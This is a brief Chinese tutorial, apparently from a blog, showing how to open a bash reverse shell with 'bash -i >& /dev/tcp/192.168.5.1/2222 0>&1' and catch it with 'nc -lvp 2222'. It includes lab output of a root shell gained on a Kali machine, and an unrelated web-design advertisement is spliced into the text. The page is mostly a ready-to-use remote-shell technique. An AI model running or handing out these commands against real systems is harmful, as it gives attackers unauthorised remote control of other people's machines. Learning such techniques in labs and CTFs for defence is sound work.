bash是一个命令解释语言,能够执行读取标准输入或文件的命令,可以执行命令以及结合nc进行反弹shell!
成都创新互联公司-专业网站定制、快速模板网站建设、高性价比兰溪网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式兰溪网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖兰溪地区。费用合理售后完善,10余年实体公司更值得信赖。
基本使用语法
bash -c 命令
root@kali:~# bash -c whoami root root@kali:~#
另外使用-i表示以交互方式运行shell,通常在目标主机上运行
bash -i >& /dev/tcp/192.168.5.1/2222 0>&1
然后另一台主机使用nc进行监听该端口,即可获取到一个shell!
目标主机:
root@kali:~# bash -i >& /dev/tcp/192.168.5.1/2222 0>&1
***主机:
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc -lvp 2222 lstn on [any] 2222 .. 192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATA connect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53418: NO_DATA root@kali:~# uname -a uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux root@kali:~# whoami whoami root root@kali:~#exit